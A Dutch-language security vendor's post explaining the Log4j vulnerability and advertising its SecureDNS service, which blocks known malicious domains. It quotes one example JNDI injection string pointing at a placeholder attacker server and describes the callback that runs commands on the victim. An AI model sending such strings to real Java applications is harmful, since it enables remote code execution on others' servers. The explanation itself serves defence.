De afgelopen dagen stond het beveiligingsnieuws in het teken van een groot nieuw lek die hackers potentieel toegang biedt tot servers van allerlei bedrijven. Het gaat om een kwetsbaarheid in Log4j: logboeksoftware die wordt gebruikt door Apache-webservers om zaken als veranderingen en foutmeldingen bij te houden. Door die kwetsbaarheid kunnen hackers inbreken in de servers van bedrijven. De meest voorkomende domeinen of IP-adressen die worden gebruikt als onderdeel van de scan- of het uitlezen van gegevens zijn bekende kwaadaardige domeinen.

Als een aanvaller een string zoals bijvoorbeeld “${jndi:ldap://attackerserver.com.com/x}” naar de JAVA applicatie weet te sturen , dan wordt er verbinding gemaakt naar een door de aanvaller beheerde server. Hier wordt doorgaans BASE64 of JAVA gecodeerde opdrachten gebruikt om het minder te laten opvallen (obfuscatie), maar is geen vereiste.

De server van de aanvaller zal als gevolg een commando terugsturen (de callback) die dan op de eigen server waar de Java Applicatie draait worden uitgevoerd met alle gevolgen van dien.

Aangezien deze domeinen reeds geregistreerd staan in de database waarmee SecureDNS werkt worden deze automatisch geblokkeerd. SecureDNS vormt daarmee een snelle reputatiecheck van kwaadaardige websites die je bedrijf beschermt tegen deze kwetsbaarheid. Met SecureDNS bescherm je het uitgaande verkeer en voorkom je dat kwaadaardige software kan worden gedownload van servers.

Uiteraard dien je zodra deze beschikbaar zijn, nog steeds de noodzakelijke updates te installeren om je omgeving permanent veilig te houden. Voor onze klanten hebben wij een speciaal dashboard aangemaakt voor Log4j kwetsbaarheid en indien een detectie voorkomt zullen wij onze klanten pro-actief informeren.

Meer weten over SecureDNS?  https://wijzijnsecutec.nl/secure-dns/